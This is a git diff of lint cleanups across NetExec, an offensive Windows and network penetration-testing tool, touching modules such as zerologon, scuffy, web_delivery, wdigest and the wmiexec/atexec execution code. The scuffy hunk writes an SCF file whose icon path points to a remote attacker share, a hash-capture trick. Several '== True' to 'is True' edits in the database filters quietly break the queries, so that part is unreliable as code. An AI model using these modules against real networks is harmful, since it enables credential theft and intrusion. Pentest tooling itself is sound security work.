d5869261..08509a7a 100644 --- a/nxc/modules/runasppl.py +++ b/nxc/modules/runasppl.py @@ -21,6 +21,6 @@ class NXCModule: context.log.display("Executing command") p = connection.execute(command, True) if "The system was unable to find the specified registry key or value" in p: - context.log.debug(f"Unable to find RunAsPPL Registry Key") + context.log.debug("Unable to find RunAsPPL Registry Key") else: context.log.highlight(p) diff --git a/nxc/modules/scan-network.py b/nxc/modules/scan-network.py index 3770ad91..e96fcd5e 100644 --- a/nxc/modules/scan-network.py +++ b/nxc/modules/scan-network.py @@ -136,8 +136,7 @@ class NXCModule: pass else: raise - targetentry = None - dnsresolver = get_dns_resolver(connection.host, context.log) + get_dns_resolver(connection.host, context.log) outdata = [] diff --git a/nxc/modules/scuffy.py b/nxc/modules/scuffy.py index cbca3a60..3eb22310 100644 --- a/nxc/modules/scuffy.py +++ b/nxc/modules/scuffy.py @@ -53,8 +53,8 @@ class NXCModule: if not self.cleanup: self.server = module_options["SERVER"] scuf = open(self.scf_path, "a") - scuf.write(f"[Shell]\n") - scuf.write(f"Command=2\n") + scuf.write("[Shell]\n") + scuf.write("Command=2\n") scuf.write(f"IconFile=\\\\{self.server}\\share\\icon.ico\n") scuf.close() diff --git a/nxc/modules/spider_plus.py b/nxc/modules/spider_plus.py index 600e6605..54d062cf 100755 --- a/nxc/modules/spider_plus.py +++ b/nxc/modules/spider_plus.py @@ -236,7 +236,7 @@ class SMBSpiderPlus: self.spider_folder(share_name, "") except SessionError: traceback.print_exc() - self.logger.fail(f"Got a session error while spidering.") + self.logger.fail("Got a session error while spidering.") self.reconnect() except Exception as e: diff --git a/nxc/modules/spooler.py b/nxc/modules/spooler.py index bbf75483..8be10b7d 100644 --- a/nxc/modules/spooler.py +++ b/nxc/modules/spooler.py @@ -110,18 +110,18 @@ class NXCModule: host.signing, spooler=True, ) - except Exception as e: - context.log.debug(f"Error updating spooler status in database") + except Exception: + context.log.debug("Error updating spooler status in database") break if entries: num = len(entries) if 1 == num: - context.log.debug(f"[Spooler] Received one endpoint") + context.log.debug("[Spooler] Received one endpoint") else: context.log.debug(f"[Spooler] Received {num} endpoints") else: - context.log.debug(f"[Spooler] No endpoints found") + context.log.debug("[Spooler] No endpoints found") def __fetch_list(self, rpctransport): dce = rpctransport.get_dce_rpc() diff --git a/nxc/modules/subnets.py b/nxc/modules/subnets.py index 67db7306..761f0564 100644 --- a/nxc/modules/subnets.py +++ b/nxc/modules/subnets.py @@ -83,7 +83,7 @@ class NXCModule: if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) is not True: continue subnet = searchResEntry_to_dict(subnet) - subnet_dn = subnet["distinguishedName"] + subnet["distinguishedName"] subnet_name = subnet["name"] if self.showservers: diff --git a/nxc/modules/veeam_dump.py b/nxc/modules/veeam_dump.py index 477dbe01..295d8506 100644 --- a/nxc/modules/veeam_dump.py +++ b/nxc/modules/veeam_dump.py @@ -103,7 +103,7 @@ class NXCModule: context.log.fail(f"UNEXPECTED ERROR: {e}") context.log.debug(traceback.format_exc()) - except NotImplementedError as e: + except NotImplementedError: pass except Exception as e: context.log.fail(f"UNEXPECTED ERROR: {e}") diff --git a/nxc/modules/wcc.py b/nxc/modules/wcc.py index c3d47b7b..e1f1e20b 100644 --- a/nxc/modules/wcc.py +++ b/nxc/modules/wcc.py @@ -4,12 +4,10 @@ import json import logging import operator -import sys import time from termcolor import colored from nxc.logger import nxc_logger -from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5 import rrp, samr, scmr from impacket.dcerpc.v5.rrp import DCERPCSessionError from impacket.smbconnection import SessionError as SMBSessionError @@ -305,7 +303,7 @@ class HostChecker: # Add check to conf_checks table if missing db_checks = self.connection.db.get_checks() - db_check_names = [ check._asdict()['name'].strip().lower() for check in db_checks ] + [ check._asdict()['name'].strip().lower() for check in db_checks ] added = [] for i,check in enumerate(self.checks): check.connection = self.connection @@ -646,7 +644,7 @@ class HostChecker: ans = rrp.hBaseRegEnumKey(dce=dce, hKey=subkey_handle, dwIndex=i) subkeys.append(ans['lpNameOut'][:-1]) i += 1 - except DCERPCSessionError as e: + except DCERPCSessionError: break return subkeys diff --git a/nxc/modules/wdigest.py b/nxc/modules/wdigest.py index b3620bad..c755c56d 100644 --- a/nxc/modules/wdigest.py +++ b/nxc/modules/wdigest.py @@ -19,7 +19,7 @@ class NXCModule: ACTION Create/Delete the registry key (choices: enable, disable, check) """ - if not "ACTION" in module_options: + if "ACTION" not in module_options: context.log.fail("ACTION option not specified!") exit(1) diff --git a/nxc/modules/web_delivery.py b/nxc/modules/web_delivery.py index baa50efa..327bbbc7 100644 --- a/nxc/modules/web_delivery.py +++ b/nxc/modules/web_delivery.py @@ -24,7 +24,7 @@ class NXCModule: PAYLOAD Payload architecture (choices: 64 or 32) Default: 64 """ - if not "URL" in module_options: + if "URL" not in module_options: context.log.fail("URL option is required!") exit(1) diff --git a/nxc/modules/whoami.py b/nxc/modules/whoami.py index 840a4040..1e766a36 100644 --- a/nxc/modules/whoami.py +++ b/nxc/modules/whoami.py @@ -48,27 +48,27 @@ class NXCModule: for response in r[0]["attributes"]: if "userAccountControl" in str(response["type"]): if str(response["vals"][0]) == "512": - context.log.highlight(f"Enabled: Yes") - context.log.highlight(f"Password Never Expires: No") + context.log.highlight("Enabled: Yes") + context.log.highlight("Password Never Expires: No") elif str(response["vals"][0]) == "514": - context.log.highlight(f"Enabled: No") - context.log.highlight(f"Password Never Expires: No") + context.log.highlight("Enabled: No") + context.log.highlight("Password Never Expires: No") elif str(response["vals"][0]) == "66048": - context.log.highlight(f"Enabled: Yes") - context.log.highlight(f"Password Never Expires: Yes") + context.log.highlight("Enabled: Yes") + context.log.highlight("Password Never Expires: Yes") elif str(response["vals"][0]) == "66050": - context.log.highlight(f"Enabled: No") - context.log.highlight(f"Password Never Expires: Yes") + context.log.highlight("Enabled: No") + context.log.highlight("Password Never Expires: Yes") elif "lastLogon" in str(response["type"]): if str(response["vals"][0]) == "1601": - context.log.highlight(f"Last logon: Never") + context.log.highlight("Last logon: Never") else: context.log.highlight(f"Last logon: {response['vals'][0]}") elif "memberOf" in str(response["type"]): for group in response["vals"]: context.log.highlight(f"Member of: {group}") elif "servicePrincipalName" in str(response["type"]): - context.log.highlight(f"Service Account Name(s) found - Potentially Kerberoastable user!") + context.log.highlight("Service Account Name(s) found - Potentially Kerberoastable user!") for spn in response["vals"]: context.log.highlight(f"Service Account Name: {spn}") else: diff --git a/nxc/modules/zerologon.py b/nxc/modules/zerologon.py index da592364..369e0ea0 100644 --- a/nxc/modules/zerologon.py +++ b/nxc/modules/zerologon.py @@ -42,8 +42,8 @@ class NXCModule: host.signing, zerologon=True, ) - except Exception as e: - self.context.log.debug(f"Error updating zerologon status in database") + except Exception: + self.context.log.debug("Error updating zerologon status in database") def perform_attack(self, dc_handle, dc_ip, target_computer): # Keep authenticating until successful. Expected average number of attempts needed: 256. @@ -60,8 +60,8 @@ class NXCModule: return True else: self.context.log.highlight("Attack failed. Target is probably patched.") - except DCERPCException as e: - self.context.log.fail(f"Error while connecting to host: DCERPCException, " f"which means this is probably not a DC!") + except DCERPCException: + self.context.log.fail("Error while connecting to host: DCERPCException, " "which means this is probably not a DC!") def fail(msg): nxc_logger.debug(msg) diff --git a/nxc/netexec.py b/nxc/netexec.py index edf92993..8d7dd803 100755 --- a/nxc/netexec.py +++ b/nxc/netexec.py @@ -11,7 +11,7 @@ from nxc.loaders.moduleloader import ModuleLoader from nxc.servers.http import NXCHTTPServer from nxc.first_run import first_run_setup from nxc.context import Context -from nxc.paths import NXC_PATH, DATA_PATH +from nxc.paths import NXC_PATH from nxc.console import nxc_console from nxc.logger import nxc_logger from nxc.config import nxc_config, nxc_workspace, config_log, ignore_opsec @@ -46,7 +46,7 @@ def create_db_engine(db_path): async def start_run(protocol_obj, args, db, targets): - nxc_logger.debug(f"Creating ThreadPoolExecutor") + nxc_logger.debug("Creating ThreadPoolExecutor") if args.no_progress or len(targets) == 1: with ThreadPoolExecutor(max_workers=args.threads + 1) as executor: nxc_logger.debug(f"Creating thread for {protocol_obj}") @@ -98,7 +98,7 @@ def main(): if args.protocol == "ssh": if args.key_file: if not args.password: - nxc_logger.fail(f"Password is required, even if a key file is used - if no passphrase for key, use `-p ''`") + nxc_logger.fail("Password is required, even if a key file is used - if no passphrase for key, use `-p ''`") exit(1) if args.use_kcache and not os.environ.get("KRB5CCNAME"): @@ -192,8 +192,8 @@ def main(): if not module.opsec_safe: if ignore_opsec: - nxc_logger.debug(f"ignore_opsec is set in the configuration, skipping prompt") - nxc_logger.display(f"Ignore OPSEC in configuration is set and OPSEC unsafe module loaded") + nxc_logger.debug("ignore_opsec is set in the configuration, skipping prompt") + nxc_logger.display("Ignore OPSEC in configuration is set and OPSEC unsafe module loaded") else: ans = input( highlight( diff --git a/nxc/parsers/ip.py b/nxc/parsers/ip.py index 9a1371e9..e44bef33 100755 --- a/nxc/parsers/ip.py +++ b/nxc/parsers/ip.py @@ -24,5 +24,5 @@ def parse_targets(target): else: for ip in ip_network(target, strict=False): yield str(ip) - except ValueError as e: + except ValueError: yield str(target) diff --git a/nxc/protocols/ftp.py b/nxc/protocols/ftp.py index 98dfc7d9..f283685b 100644 --- a/nxc/protocols/ftp.py +++ b/nxc/protocols/ftp.py @@ -87,7 +87,7 @@ class ftp(connection): if self.args.ls: files = self.list_directory_full() - self.logger.display(f"Directory Listing") + self.logger.display("Directory Listing") for file in files: self.logger.highlight(file) diff --git a/nxc/protocols/ldap.py b/nxc/protocols/ldap.py index 6f1eac2f..38691d1e 100644 --- a/nxc/protocols/ldap.py +++ b/nxc/protocols/ldap.py @@ -176,7 +176,7 @@ class ldap(connection): if proto == "ldaps": self.logger.debug(f"LDAPs connection to {ldap_url} failed - {e}") # https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority - self.logger.debug(f"Even if the port is open, LDAPS may not be configured") + self.logger.debug("Even if the port is open, LDAPS may not be configured") else: self.logger.debug(f"LDAP connection to {ldap_url} failed: {e}") return [None, None, None] @@ -207,7 +207,7 @@ class ldap(connection): except Exception as e: self.logger.debug("Exception:", exc_info=True) self.logger.info(f"Skipping item, cannot process due to error {e}") - except OSError as e: + except OSError: return [None, None, None] self.logger.debug(f"Target: {target}; target_domain: {target_domain}; base_dn: {base_dn}") return [target, target_domain, base_dn] @@ -634,12 +634,12 @@ class ldap(connection): return False def create_smbv1_conn(self): - self.logger.debug(f"Creating smbv1 connection object") + self.logger.debug("Creating smbv1 connection object") try: self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT) self.smbv1 = True if self.conn: - self.logger.debug(f"SMBv1 Connection successful") + self.logger.debug("SMBv1 Connection successful") except socket.error as e: if str(e).find("Connection reset by peer") != -1: self.logger.debug(f"SMBv1 might be disabled on {self.host}") @@ -650,12 +650,12 @@ class ldap(connection): return True def create_smbv3_conn(self): - self.logger.debug(f"Creating smbv3 connection object") + self.logger.debug("Creating smbv3 connection object") try: self.conn = SMBConnection(self.host, self.host, None, 445) self.smbv1 = False if self.conn: - self.logger.debug(f"SMBv3 Connection successful") + self.logger.debug("SMBv3 Connection successful") except socket.error: return False except Exception as e: @@ -775,16 +775,12 @@ class ldap(connection): resp = self.search(search_filter, attributes, sizeLimit=0) if resp: - answers = [] self.logger.display(f"Total of records returned {len(resp):d}") for item in resp: if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True: continue sAMAccountName = "" - badPasswordTime = "" - badPwdCount = 0 description = "" - pwdLastSet = "" try: if self.username == "": self.logger.highlight(f"{item['objectName']}") @@ -806,7 +802,6 @@ class ldap(connection): attributes = ["name"] resp = self.search(search_filter, attributes, 0) if resp: - answers = [] self.logger.debug(f"Total of records returned {len(resp):d}") for item in resp: @@ -840,7 +835,7 @@ class ldap(connection): name = str(attribute["vals"][0]) try: ip_address = socket.gethostbyname(name.split(".")[0]) - if ip_address != True and name != "": + if ip_address is not True and name != "": self.logger.highlight(f"{name} =", ip_address) except socket.gaierror: self.logger.fail(f"{name} = Connection timeout") @@ -1270,7 +1265,6 @@ class ldap(connection): searchBase=self.baseDN, ) if gmsa_accounts: - answers = [] self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}") for item in gmsa_accounts: @@ -1320,7 +1314,6 @@ class ldap(connection): searchBase=self.baseDN, ) if gmsa_accounts: - answers = [] self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}") for item in gmsa_accounts: @@ -1351,7 +1344,6 @@ class ldap(connection): searchBase=self.baseDN, ) if gmsa_accounts: - answers = [] self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}") for item in gmsa_accounts: diff --git a/nxc/protocols/ldap/database.py b/nxc/protocols/ldap/database.py index 97145bab..73d1529d 100644 --- a/nxc/protocols/ldap/database.py +++ b/nxc/protocols/ldap/database.py @@ -48,7 +48,7 @@ class database: ) def reflect_tables(self): - with self.db_engine.connect() as conn: + with self.db_engine.connect(): try: self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) diff --git a/nxc/protocols/ldap/laps.py b/nxc/protocols/ldap/laps.py index 08a9d5c6..ccc7eaf4 100644 --- a/nxc/protocols/ldap/laps.py +++ b/nxc/protocols/ldap/laps.py @@ -71,7 +71,6 @@ class LDAPConnect: useCache=False, ) # Connect to LDAP - out = f"{domain}{username}:{password if password else ntlm_hash}" self.logger.extra["protocol"] = "LDAP" self.logger.extra["port"] = "389" return ldapConnection @@ -108,7 +107,7 @@ class LDAPConnect: ) return False - except OSError as e: + except OSError: self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}") return False except KerberosError as e: @@ -141,7 +140,6 @@ class LDAPConnect: ldapConnection.login(username, password, domain, lmhash, nthash) # Connect to LDAP - out = "{domain}\\{username}:{password if password else ntlm_hash}" self.logger.extra["protocol"] = "LDAP" self.logger.extra["port"] = "389" # self.logger.success(out) @@ -172,7 +170,7 @@ class LDAPConnect: ) return False - except OSError as e: + except OSError: self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}") return False diff --git a/nxc/protocols/mssql.py b/nxc/protocols/mssql.py index d288e5a3..3195f847 100755 --- a/nxc/protocols/mssql.py +++ b/nxc/protocols/mssql.py @@ -1,13 +1,10 @@ #!/usr/bin/env python3 # -*- coding: utf-8 -*- -import logging import os -from io import StringIO from nxc.config import process_secret from nxc.protocols.mssql.mssqlexec import MSSQLEXEC from nxc.connection import * -from nxc.helpers.logger import highlight from nxc.helpers.bloodhound import add_user_bh from nxc.helpers.powershell import create_ps_command from impacket import tds @@ -138,7 +135,7 @@ class mssql(connection): if is_admin: self.admin_privs = True - self.logger.debug(f"User is admin") + self.logger.debug("User is admin") else: return False return True @@ -159,16 +156,14 @@ class mssql(connection): pass self.create_conn_obj() - nthash = "" hashes = None if ntlm_hash != "": if ntlm_hash.find(":") != -1: hashes = ntlm_hash - nthash = ntlm_hash.split(":")[1] + ntlm_hash.split(":")[1] else: # only nt hash hashes = f":{ntlm_hash}" - nthash = ntlm_hash if not all("" == s for s in [self.nthash, password, aesKey]): kerb_pass = next(s for s in [self.nthash, password, aesKey] if s) @@ -244,8 +239,8 @@ class mssql(connection): if not self.args.local_auth: add_user_bh(self.username, self.domain, self.logger, self.config) return True - except BrokenPipeError as e: - self.logger.fail(f"Broken Pipe Error while attempting to login") + except BrokenPipeError: + self.logger.fail("Broken Pipe Error while attempting to login") return False except Exception as e: self.logger.fail(f"{domain}\\{username}:{process_secret(password)}") @@ -295,8 +290,8 @@ class mssql(connection): if not self.args.local_auth: add_user_bh(self.username, self.domain, self.logger, self.config) return True - except BrokenPipeError as e: - self.logger.fail(f"Broken Pipe Error while attempting to login") + except BrokenPipeError: + self.logger.fail("Broken Pipe Error while attempting to login") return False except Exception as e: self.logger.fail(f"{domain}\\{username}:{process_secret(ntlm_hash)} {e}") @@ -348,7 +343,7 @@ class mssql(connection): if self.args.execute or self.args.ps_execute: self.logger.success("Executed command via mssqlexec") if self.args.no_output: - self.logger.debug(f"Output set to disabled") + self.logger.debug("Output set to disabled") else: for line in raw_output: self.logger.highlight(line) diff --git a/nxc/protocols/mssql/database.py b/nxc/protocols/mssql/database.py index 6818495d..f1751346 100755 --- a/nxc/protocols/mssql/database.py +++ b/nxc/protocols/mssql/database.py @@ -71,7 +71,7 @@ class database: ) def reflect_tables(self): - with self.db_engine.connect() as conn: + with self.db_engine.connect(): try: self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine) @@ -312,7 +312,7 @@ class database: return [results] # if we're filtering by domain controllers elif filter_term == "dc": - q = q.filter(self.HostsTable.c.dc == True) + q = q.filter(self.HostsTable.c.dc is True) if domain: q = q.filter(func.lower(self.HostsTable.c.domain) == func.lower(domain)) # if we're filtering by ip/hostname diff --git a/nxc/protocols/mssql/mssqlexec.py b/nxc/protocols/mssql/mssqlexec.py index 07b392c8..92fe583b 100755 --- a/nxc/protocols/mssql/mssqlexec.py +++ b/nxc/protocols/mssql/mssqlexec.py @@ -27,7 +27,7 @@ class MSSQLEXEC: nxc_logger.error(f"Error when attempting to execute command via xp_cmdshell: {e}") if output: - nxc_logger.debug(f"Output is enabled") + nxc_logger.debug("Output is enabled") for row in command_output: nxc_logger.debug(row) # self.mssql_conn.printReplies() diff --git a/nxc/protocols/rdp.py b/nxc/protocols/rdp.py index 1fca17f6..7aff8021 100644 --- a/nxc/protocols/rdp.py +++ b/nxc/protocols/rdp.py @@ -175,7 +175,7 @@ class rdp(connection): if str(proto) == "SUPP_PROTOCOLS.RDP" or str(proto) == "SUPP_PROTOCOLS.SSL" or str(proto) == "SUPP_PROTOCOLS.SSL|SUPP_PROTOCOLS.RDP": self.nla = False return - except Exception as e: + except Exception: pass async def connect_rdp(self): @@ -204,7 +204,7 @@ class rdp(connection): else: kerb_pass = "" - fqdn_host = self.hostname + "." + self.domain + self.hostname + "." + self.domain password = password if password else nthash if useCache: @@ -353,7 +353,7 @@ class rdp(connection): try: self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth) await self.connect_rdp() - except Exception as e: + except Exception: return await asyncio.sleep(int(5)) diff --git a/nxc/protocols/rdp/database.py b/nxc/protocols/rdp/database.py index 9b72164c..1e7234ca 100644 --- a/nxc/protocols/rdp/database.py +++ b/nxc/protocols/rdp/database.py @@ -50,7 +50,7 @@ class database: ) def reflect_tables(self): - with self.db_engine.connect() as conn: + with self.db_engine.connect(): try: self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) diff --git a/nxc/protocols/smb.py b/nxc/protocols/smb.py index 970a8778..ea094290 100755 --- a/nxc/protocols/smb.py +++ b/nxc/protocols/smb.py @@ -27,7 +27,7 @@ from impacket.krb5.kerberosv5 import SessionKeyDecryptionError from impacket.krb5.types import KerberosException from impacket.dcerpc.v5.dtypes import NULL from impacket.dcerpc.v5.dcomrt import DCOMConnection -from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login +from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login from nxc.config import process_secret, host_info_colors from nxc.connection import * @@ -214,7 +214,7 @@ class smb(connection): try: self.conn.login("", "") except BrokenPipeError: - self.logger.fail(f"Broken Pipe Error while attempting to login") + self.logger.fail("Broken Pipe Error while attempting to login") except Exception as e: if "STATUS_NOT_SUPPORTED" in str(e): # no ntlm supported @@ -510,8 +510,8 @@ class smb(connection): except (ConnectionResetError, NetBIOSTimeout, NetBIOSError) as e: self.logger.fail(f"Connection Error: {e}") return False - except BrokenPipeError as e: - self.logger.fail(f"Broken Pipe Error while attempting to login") + except BrokenPipeError: + self.logger.fail("Broken Pipe Error while attempting to login") return False def hash_login(self, domain, username, ntlm_hash): @@ -576,8 +576,8 @@ class smb(connection): except (ConnectionResetError, NetBIOSTimeout, NetBIOSError) as e: self.logger.fail(f"Connection Error: {e}") return False - except BrokenPipeError as e: - self.logger.fail(f"Broken Pipe Error while attempting to login") + except BrokenPipeError: + self.logger.fail("Broken Pipe Error while attempting to login") return False def create_smbv1_conn(self, kdc=""): @@ -646,7 +646,7 @@ class smb(connection): try: # 0xF003F - SC_MANAGER_ALL_ACCESS # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx - ans = scmr.hROpenSCManagerW(dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F) + scmr.hROpenSCManagerW(dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F) self.admin_privs = True except scmr.DCERPCException: self.admin_privs = False diff --git a/nxc/protocols/smb/atexec.py b/nxc/protocols/smb/atexec.py index 513c5211..83758401 100755 --- a/nxc/protocols/smb/atexec.py +++ b/nxc/protocols/smb/atexec.py @@ -195,7 +195,7 @@ class TSCH_EXEC: except IOError: sleep(2) else: - peer = ":".join(map(str, self.__rpctransport.get_socket().getpeername())) + ":".join(map(str, self.__rpctransport.get_socket().getpeername())) smbConnection = self.__rpctransport.get_smb_connection() tries = 1 while True: @@ -205,7 +205,7 @@ class TSCH_EXEC: break except Exception as e: if tries >= self.__tries: - self.logger.fail(f"ATEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option '--get-output-tries'. If it is still failing, try the 'wmi' protocol or another exec method") + self.logger.fail("ATEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option '--get-output-tries'. If it is still failing, try the 'wmi' protocol or another exec method") break if str(e).find("STATUS_BAD_NETWORK_NAME") >0 : self.logger.fail(f"ATEXEC: Getting the output file failed - target has blocked access to the share: {self.__share} (but the command may have executed!)") diff --git a/nxc/protocols/smb/database.py b/nxc/protocols/smb/database.py index da248f25..6525fc12 100755 --- a/nxc/protocols/smb/database.py +++ b/nxc/protocols/smb/database.py @@ -177,7 +177,7 @@ class database: # )''') def reflect_tables(self): - with self.db_engine.connect() as conn: + with self.db_engine.connect(): try: self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine) @@ -301,7 +301,7 @@ class database: groups = [] if (group_id and not self.is_group_valid(group_id)) or (pillaged_from and not self.is_host_valid(pillaged_from)): - nxc_logger.debug(f"Invalid group or host") + nxc_logger.debug("Invalid group or host") return q = select(self.UsersTable).filter( @@ -499,18 +499,18 @@ class database: return [results] # if we're filtering by domain controllers elif filter_term == "dc": - q = q.filter(self.HostsTable.c.dc == True) + q = q.filter(self.HostsTable.c.dc is True) if domain: q = q.filter(func.lower(self.HostsTable.c.domain) == func.lower(domain)) elif filter_term == "signing": # generally we want hosts that are vulnerable, so signing disabled - q = q.filter(self.HostsTable.c.signing == False) + q = q.filter(self.HostsTable.c.signing is False) elif filter_term == "spooler": - q = q.filter(self.HostsTable.c.spooler == True) + q = q.filter(self.HostsTable.c.spooler is True) elif filter_term == "zerologon": - q = q.filter(self.HostsTable.c.zerologon == True) + q = q.filter(self.HostsTable.c.zerologon is True) elif filter_term == "petitpotam": - q = q.filter(self.HostsTable.c.petitpotam == True) + q = q.filter(self.HostsTable.c.petitpotam is True) elif filter_term is not None and filter_term.startswith("domain"): domain = filter_term.split()[1] like_term = func.lower(f"%{domain}%") @@ -700,7 +700,7 @@ class database: "read": read, "write": write, } - share_id = self.conn.execute( + self.conn.execute( Insert(self.SharesTable).on_conflict_do_nothing(), # .returning(self.SharesTable.c.id), share_data, ) # .scalar_one() diff --git a/nxc/protocols/smb/mmcexec.py b/nxc/protocols/smb/mmcexec.py index 11d9eaf1..ba726a7f 100644 --- a/nxc/protocols/smb/mmcexec.py +++ b/nxc/protocols/smb/mmcexec.py @@ -252,7 +252,7 @@ class MMCEXEC: break except Exception as e: if tries >= self.__tries: - self.logger.fail(f"MMCEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option '--get-output-tries'. If it is still failing, try the 'wmi' protocol or another exec method") + self.logger.fail("MMCEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option '--get-output-tries'. If it is still failing, try the 'wmi' protocol or another exec method") break if str(e).find("STATUS_BAD_NETWORK_NAME") >0 : self.logger.fail(f"MMCEXEC: Getting the output file failed - target has blocked access to the share: {self.__share} (but the command may have executed!)") diff --git a/nxc/protocols/smb/passpol.py b/nxc/protocols/smb/passpol.py index 50c070e3..7e63c991 100644 --- a/nxc/protocols/smb/passpol.py +++ b/nxc/protocols/smb/passpol.py @@ -46,7 +46,7 @@ def convert(low, high, lockout=False): minutes = int(strftime("%M", gmtime(tmp))) hours = int(strftime("%H", gmtime(tmp))) days = int(strftime("%j", gmtime(tmp))) - 1 - except ValueError as e: + except ValueError: return "[-] Invalid TIME" if days > 1: diff --git a/nxc/protocols/smb/samrfunc.py b/nxc/protocols/smb/samrfunc.py index 54fe770b..598ce773 100644 --- a/nxc/protocols/smb/samrfunc.py +++ b/nxc/protocols/smb/samrfunc.py @@ -61,7 +61,7 @@ class SamrFunc: domains = self.samr_query.get_domains() if "Builtin" not in domains: - logging.error(f"No Builtin group to query locally on") + logging.error("No Builtin group to query locally on") return domain_handle = self.samr_query.get_domain_handle("Builtin") @@ -93,7 +93,7 @@ class SamrFunc: if "Administrators" in self.groups: self.logger.success(f"Found Local Administrators group: RID {self.groups['Administrators']}") domain_handle = self.samr_query.get_domain_handle("Builtin") - self.logger.debug(f"Querying group members") + self.logger.debug("Querying group members") member_sids = self.samr_query.get_alias_members(domain_handle, self.groups["Administrators"]) member_names = self.lsa_query.lookup_sids(member_sids) @@ -167,7 +167,7 @@ class SAMRQuery: return None return resp["ServerHandle"] else: - nxc_logger.debug(f"Error creating Samr handle") + nxc_logger.debug("Error creating Samr handle") return def get_domains(self): diff --git a/nxc/protocols/smb/samruser.py b/nxc/protocols/smb/samruser.py index 808ac856..ef0886a6 100644 --- a/nxc/protocols/smb/samruser.py +++ b/nxc/protocols/smb/samruser.py @@ -44,7 +44,7 @@ class UserSamrDump: try: protodef = UserSamrDump.KNOWN_PROTOCOLS[protocol] port = protodef[1] - except KeyError as e: + except KeyError: self.logger.debug(f"Invalid Protocol '{protocol}'") self.logger.debug(f"Trying protocol {protocol}") rpctransport = transport.SMBTransport( diff --git a/nxc/protocols/smb/smbspider.py b/nxc/protocols/smb/smbspider.py index c2523d24..900db7cd 100755 --- a/nxc/protocols/smb/smbspider.py +++ b/nxc/protocols/smb/smbspider.py @@ -47,11 +47,10 @@ class SMBSpider: if share == "*": self.logger.display("Enumerating shares for spidering") - permissions = [] try: for share in self.smbconnection.listShares(): share_name = share["shi1_netname"][:-1] - share_remark = share["shi1_remark"][:-1] + share["shi1_remark"][:-1] try: self.smbconnection.listPath(share_name, "*") self.share = share_name diff --git a/nxc/protocols/smb/wmiexec.py b/nxc/protocols/smb/wmiexec.py index 5adfc5ac..88f4c4da 100755 --- a/nxc/protocols/smb/wmiexec.py +++ b/nxc/protocols/smb/wmiexec.py @@ -6,7 +6,6 @@ import os from time import sleep from nxc.connection import dcom_FirewallChecker from nxc.helpers.misc import gen_random_string -from impacket.dcerpc.v5 import transport from impacket.dcerpc.v5.dcomrt import DCOMConnection from impacket.dcerpc.v5.dcom import wmi from impacket.dcerpc.v5.dtypes import NULL @@ -166,7 +165,7 @@ class WMIEXEC: break except Exception as e: if tries >= self.__tries: - self.logger.fail(f"WMIEXEC: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method") + self.logger.fail("WMIEXEC: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method") break if str(e).find("STATUS_BAD_NETWORK_NAME") >0 : self.logger.fail(f"SMB connection: target has blocked {self.__share} access (maybe command executed!)") diff --git a/nxc/protocols/ssh.py b/nxc/protocols/ssh.py index d602fdf5..03b6ea42 100644 --- a/nxc/protocols/ssh.py +++ b/nxc/protocols/ssh.py @@ -71,12 +71,12 @@ class ssh(connection): # but that might be too much of an opsec concern - maybe add in a flag to do more checks? stdin, stdout, stderr = self.conn.exec_command("id") if stdout.read().decode("utf-8").find("uid=0(root)") != -1: - self.logger.info(f"Determined user is root via `id` command") + self.logger.info("Determined user is root via `id` command") self.admin_privs = True return True stdin, stdout, stderr = self.conn.exec_command("sudo -ln | grep 'NOPASSWD: ALL'") if stdout.read().decode("utf-8").find("NOPASSWD: ALL") != -1: - self.logger.info(f"Determined user is root via `sudo -ln` command") + self.logger.info("Determined user is root via `sudo -ln` command") self.admin_privs = True return True @@ -88,7 +88,7 @@ class ssh(connection): else: pkey = paramiko.RSAKey.from_private_key_file(self.args.key_file) - self.logger.debug(f"Logging in with key") + self.logger.debug("Logging in with key") self.conn.connect( self.host, port=self.args.port, @@ -115,7 +115,7 @@ class ssh(connection): key=key_data, ) else: - self.logger.debug(f"Logging in with password") + self.logger.debug("Logging in with password") self.conn.connect( self.host, port=self.args.port, @@ -146,7 +146,7 @@ class ssh(connection): stdin, stdout, stderr = self.conn.exec_command("id") output = stdout.read().decode("utf-8") if not output: - self.logger.debug(f"User cannot get a shell") + self.logger.debug("User cannot get a shell") shell_access = False else: shell_access = True @@ -156,7 +156,7 @@ class ssh(connection): if self.args.key_file: password = f"{password} (keyfile: {self.args.key_file})" - display_shell_access = f" - shell access!" if shell_access else "" + display_shell_access = " - shell access!" if shell_access else "" self.logger.success(f"{username}:{process_secret(password)} 